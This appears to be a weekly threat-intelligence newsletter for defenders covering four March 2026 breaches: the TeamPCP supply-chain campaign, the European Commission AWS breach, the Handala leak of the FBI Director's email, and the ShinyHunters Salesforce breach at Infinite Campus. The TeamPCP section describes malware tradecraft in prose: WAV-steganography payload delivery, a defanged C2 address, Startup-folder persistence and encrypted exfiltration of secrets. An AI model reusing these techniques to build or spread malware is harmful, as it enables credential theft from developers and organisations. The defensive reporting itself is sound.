A credential chain detonated across the developer ecosystem this week. TeamPCP spent nine days turning one backdoored security tool into a cascading series of poisoned packages spanning npm, PyPI, CI/CD pipelines, and telephony infrastructure, with steganography as the finishing touch. The European Commission lost 350GB of data out of an AWS account nobody was watching closely enough. Iran’s Handala group hacked the personal Gmail of the FBI Director, published his decade-old emails and photos, and framed it as revenge for the bureau seizing their domains. And ShinyHunters ran their now-routine Salesforce credential play against the student information system that manages records for 11 million American K-12 students.
This week: one supply chain campaign that should change how every organization thinks about CI/CD secret hygiene, a cloud account breach at the EU’s top executive body, an Iranian cyber retaliation that is mostly embarrassing but points toward something more serious, and a Salesforce access vector that has now been used against hundreds of organizations with almost no variation.
TeamPCP: The Credential Chain That Ate the Developer Ecosystem
What happened:
On March 19, threat actor group TeamPCP backdoored Aqua Security’s open-source vulnerability scanner Trivy, assigned CVE-2026-33634 (CVSS 9.4). The group force-pushed malicious binaries to 75 of 77 trivy-action tags and 7 setup-trivy tags, harvesting CI/CD secrets including npm tokens, Docker Hub credentials, and PyPI publishing tokens from every pipeline running Trivy without version pinning. By end of day, 44 Aqua Security GitHub repositories were renamed with the prefix tpcp-docs-. The stolen credentials fueled every subsequent attack. On March 20, using stolen npm tokens from Trivy victims, TeamPCP deployed the CanisterWorm backdoor across 46+ npm packages, automating token-to-compromise: given one stolen npm token, it enumerated all publishable packages, bumped versions, and published malicious releases across entire scopes in under 60 seconds. By March 24, LiteLLM, a widely-used AI LLM proxy library, was hit on PyPI. By March 27, the Telnyx Python telephony SDK, with 742,000 monthly downloads, was compromised the same way. This is TeamPCP’s third PyPI strike in eight days.
Technical details that matter:
The telnyx compromise introduced WAV steganography as a payload delivery mechanism, a technique the group first tested in a Kubernetes wiper variant on March 22. On Windows: downloads hangup.wav from 83[.]142[.]209[.]203:8080, decodes an XOR-obfuscated executable from the audio frames, drops it as msbuild.exe in the Windows Startup folder, running silently on every login with a 12-hour re-drop cooldown enforced by a hidden .lock file. On Linux/macOS: fetches ringtone.wav from the same C2, decodes a third-stage collector script from the WAV frames using the same XOR technique, runs it via sys.executable piped to stdin, then encrypts the output with AES-256-CBC and exfiltrates it. Stolen data is encrypted with AES-256-CBC and a hardcoded RSA-4096 public key before exfiltration. The malicious code is injected into telnyx/_client.py, causing it to be invoked when the package is imported into a Python application, with no user interaction required. The GitHub source remained clean throughout; only the PyPI artifacts were poisoned. The LiteLLM compromise was traced to a poisoned Trivy binary that exfiltrated PYPI_PUBLISH_PASSWORD from CI runners. Each link in the chain was stolen from the previous victim. TeamPCP announced collaborations with LAPSUS$ and an emerging ransomware group called Vect to conduct extortion and ransomware operations with the harvested credentials.
Why critical institutions should care:
This campaign is not opportunistic. It is a systematic, credential-chaining operation that weaponizes the security tooling organizations use to stay safe. If your CI/CD pipeline ran Trivy without version pinning during the week of March 19, your publishing tokens were probably stolen, and everything those tokens could touch became a potential attack vector. Defenders should treat any host or CI job that installed litellm 1.82.7 or 1.82.8, or telnyx 4.87.1 or 4.87.2, as a full-credential exposure event and investigate for persistence, outbound traffic, and Kubernetes activity, not just package presence. The shift from embedded payloads to live C2 delivery via steganography means static scanners that flag base64 blobs or suspicious strings will miss this entirely. The exfiltration target is your secrets: cloud credentials, database passwords, CI tokens, Kubernetes service account tokens, .env files. If any of that was accessible from an affected environment, assume it is now in TeamPCP’s possession.
Key sources:
- https://securitylabs.datadoghq.com/articles/litellm-compromised-pypi-teampcp-supply-chain-campaign/
- https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-canisterworm
- https://safedep.io/malicious-telnyx-pypi-compromise/
- https://thehackernews.com/2026/03/teampcp-pushes-malicious-telnyx.html
European Commission AWS Breach: 350GB Out the Door From a Cloud Account
What happened:
The European Union’s executive arm experienced a breach on March 24. The attack struck the commission’s Amazon Web Services account before being detected and blocked. The threat actor who claimed responsibility reached out to BleepingComputer, stating that they had stolen over 350GB of data, including multiple databases, and provided screenshots as proof of access to European Commission employee data and an email server. The Commission, which stressed that internal systems were not affected, said it is in the process of notifying the Union entities who might have been affected. The EU’s executive arm employs about 32,000 civil servants. AWS confirmed its own infrastructure was not compromised; the failure was at the account and credential layer. The Commission has not attributed the attack publicly.
Technical details that matter:
The Commission has disclosed almost nothing about the attack vector, but the evidence points clearly to identity and access management failure rather than an AWS infrastructure flaw. Security teams are continuing forensic investigations to determine how the AWS account was compromised, whether through credential theft, misconfiguration, or unauthorized access mechanisms. Cloud account compromises often stem from weak access controls, lack of multi-factor authentication, or exposed API keys. The breach fits an uncomfortable pattern, noting a separate breach of European Commission networks on January 30, linked to Ivanti EPMM exploitation seen across other European institutions. The attacker claimed access not just to website data but to an email server, which would be significantly more sensitive than the public-facing web infrastructure the Commission acknowledged. The Commission’s network architecture prevented a far more severe compromise, with strict segmentation between the public-facing AWS infrastructure and the internal network effectively neutralizing lateral movement attempts. The segmentation held, but the investigation is still establishing what exactly the attacker accessed during the window between initial compromise and detection.
Why critical institutions should care:
The EU Commission’s stated position on cloud security and digital sovereignty now has a visible crack in it. But the institutional lesson is broader: for the broader industry, cloud security is no longer just about infrastructure. Identity, access, and account-level controls are becoming the new frontline and increasingly, the weakest link. AWS did not fail here. A credential did. Any organization running workloads in cloud environments with service accounts, API keys, or admin credentials that are not rotated regularly, monitored for anomalous access, and protected with MFA faces the same exposure. The Commission’s claimed segmentation between its public-facing AWS environment and its core systems may have saved it from a catastrophic outcome, but 350GB of data leaving a government cloud account is not a contained incident, it is a disclosure and counter-intelligence problem that will take months to fully scope.
Key sources:
- https://www.bleepingcomputer.com/news/security/european-commission-investigating-breach-after-amazon-cloud-account-hack/
- https://techcrunch.com/2026/03/27/european-commission-confirms-cyberattack-after-hackers-claim-data-breach/
- https://cybernews.com/news/european-commission-aws-cloud-breach-stolen-data/
- https://securityaffairs.com/190067/data-breach/the-european-commission-confirmed-a-cyberattack-affecting-part-of-its-cloud-systems.html
Handala Hacks the FBI Director’s Gmail: Iran’s Retaliatory Cyber Signal
What happened:
A hacking group backed by the Iranian government dubbed Handala said on Friday that it has breached the personal email account of FBI director Kash Patel. The FBI confirmed that Patel’s emails had been targeted. Alongside photographs of Patel, the hackers published a sample of more than 300 emails, which appear to show a mix of personal and work correspondence dating between 2010 and 2019. Handala claims the breach is in response to the FBI’s operation last week to seize several of the hacker group’s domains, after Handala claimed responsibility for a cyberattack on U.S. medical tech company Stryker. The FBI stated the information “is historical in nature and involves no government information.” The metadata on the published files indicates the emails were obtained before the current conflict escalated.
Technical details that matter:
The personal Gmail address that Handala claims to have broken into matches the address linked to Patel in previous data breaches preserved by dark web intelligence firm District 4 Labs. This suggests the initial access vector was almost certainly credential stuffing using previously breached credentials, or a targeted phishing operation against a personal account that was not protected by hardware security keys. U.S. officials told Patel in late 2024 that he had been the target of an Iranian cyberattack before he agreed to lead the FBI, and that the hackers had sought his communications. The 2024 campaign, attributed to Iran’s IRGC, targeted multiple incoming Trump officials using compromised personal accounts. Handala has now either retained access to material from that 2024 compromise and is publishing it now, or conducted a second, separate intrusion. The distinction matters significantly: one is a fresh breach, the other is a slow-drip release of previously stolen material timed for maximum political effect. The folders containing the leaked emails were last modified on May 21, 2025, suggesting collection happened well before publication.
Why critical institutions should care:
The operational lesson here is not that the FBI Director got hacked. Senior officials at critical institutions are high-value targets for exactly this kind of influence operation, and the separation between personal and professional digital identity matters enormously. Iran is known to lean on proxy groups like Handala for its cyber operations, making it more difficult for targeted entities to formally attribute attacks to the Iranian government. What this incident demonstrates is that personal email accounts at consumer providers like Gmail, regardless of the individual’s professional role or security clearance, are not protected by enterprise security controls, are frequently reachable via credential stuffing from old breaches, and can become weapons long after the initial compromise. Any organization whose leadership conducts sensitive professional discussions over personal email channels is running the same risk. The timing of publication, framed as retaliation for a law enforcement action, is also a signal: Handala is demonstrating an ability to respond to U.S. government pressure with public embarrassment of senior officials.
Key sources:
- https://techcrunch.com/2026/03/27/iranian-hackers-claim-breach-of-fbi-director-kash-patels-personal-email-account/
- https://www.axios.com/2026/03/27/fbi-kash-patel-iran-cyberattack
- https://www.cnbc.com/2026/03/27/iran-hackers-fbi-director-kash-patel.html
- https://www.nbcnews.com/tech/security/iranian-hackers-publish-emails-allegedly-stolen-kash-patel-rcna265490
ShinyHunters vs. Infinite Campus: The Salesforce Account Play, Again
What happened:
Infinite Campus, a major U.S. K-12 student information system provider, warned customers of a security incident after attackers gained access to an employee’s Salesforce account, exposing limited data primarily consisting of contact and directory-style information. The company said it detected suspicious activity on March 18, 2026, quickly disabled the affected account, and launched an investigation, adding that there is no evidence customer databases or student records were accessed. ShinyHunters gave the company until March 25 to initiate contact and negotiate a ransom. Infinite Campus said it will not engage with the attacker. The company manages data for 11 million students across 3,200 school districts in 46 states. The attackers’ actual haul appears to have been primarily school staff contact information, not student records.
Technical details that matter:
ShinyHunters have been running campaigns against Salesforce customers for several months, with victims including Cisco, Adidas, Qantas, and Allianz Life. In their attacks, they use voice phishing (vishing) to trick employees into granting access, or steal OAuth tokens, and then use that access to exfiltrate CRM data. ShinyHunters is described as a group known for targeting the Salesforce accounts of hundreds of companies, claiming more than 1.5 billion records stolen across the Salesloft Drift hack and the more recent Salesforce Aura campaign. The attack on Infinite Campus follows the same playbook: single employee account compromise, CRM data exfiltration, dark web listing with a short deadline, threats to escalate. What distinguishes this instance is the target’s sector. Salesforce CRM data at an EdTech company that is the interface between schools and a student information system could contain support tickets with sensitive student or family information, login credentials, or system configuration details, even if the core student databases remained untouched.
Why critical institutions should care:
Could clients have included their login or other credentials in their help tickets with Salesforce? Could they have included any actual or sensitive student or employee data in seeking customer support? That is not yet fully known. This is the underlying risk that Infinite Campus and every other SaaS vendor with a Salesforce support infrastructure faces: the CRM that manages customer relationships often contains far more sensitive data than intended, because users paste credentials, describe system configurations, or attach sensitive files when seeking help. ShinyHunters has now proven this attack works at scale against hundreds of organizations. The Salesforce Aura misconfigurations that expose data between tenants, combined with vishing or OAuth token theft to gain initial access, represent a systematic vulnerability in how organizations manage their customer-facing CRM environments. A student information system with 11 million students in scope is an obvious target for exactly this kind of incremental data collection.
Key sources:
- https://www.bleepingcomputer.com/news/security/infinite-campus-warns-of-breach-after-shinyhunters-claims-data-theft/
- https://cybernews.com/security/software-11m-students-hacked-shinyhunters-attack/
- https://databreaches.net/2026/03/25/infinite-campus-security-incident-awareness-no-impact-to-student-data-according-to-infinite-campus/
- https://www.techradar.com/pro/security/11-million-students-possibly-at-risk-after-classroom-software-used-by-millions-hacked
The Pattern This Week
The unifying thread is not sophistication. It is patience and reuse. TeamPCP did not invent a novel vulnerability; they compromised one security tool and then methodically spent nine days extracting value from every credential it exposed, moving from npm to PyPI to AI libraries to telephony infrastructure. Handala did not break into classified FBI systems; they published material from a 2024 personal Gmail compromise at the most politically embarrassing moment possible. ShinyHunters did not build new attack infrastructure; they ran the same Salesforce vishing play they have used against hundreds of organizations, against a company sitting in front of 11 million student records.
The European Commission’s breach is the only one this week where the attack vector remains genuinely unknown. That ambiguity is worth noting: the absence of attribution and technical detail from the Commission means defenders cannot determine whether they face the same exposure. When major institutions do not disclose attack vectors, the rest of the sector cannot learn from the incident.
The defender’s problem across all four incidents is that none of these vectors require zero-days. Compromised CI/CD credentials, an AWS account without adequate access controls, a personal Gmail, and a Salesforce account accessed via stolen OAuth tokens. If you are waiting for sophisticated adversaries with novel exploits before taking cloud identity management seriously, you are protecting against the wrong threat model.
See you next week.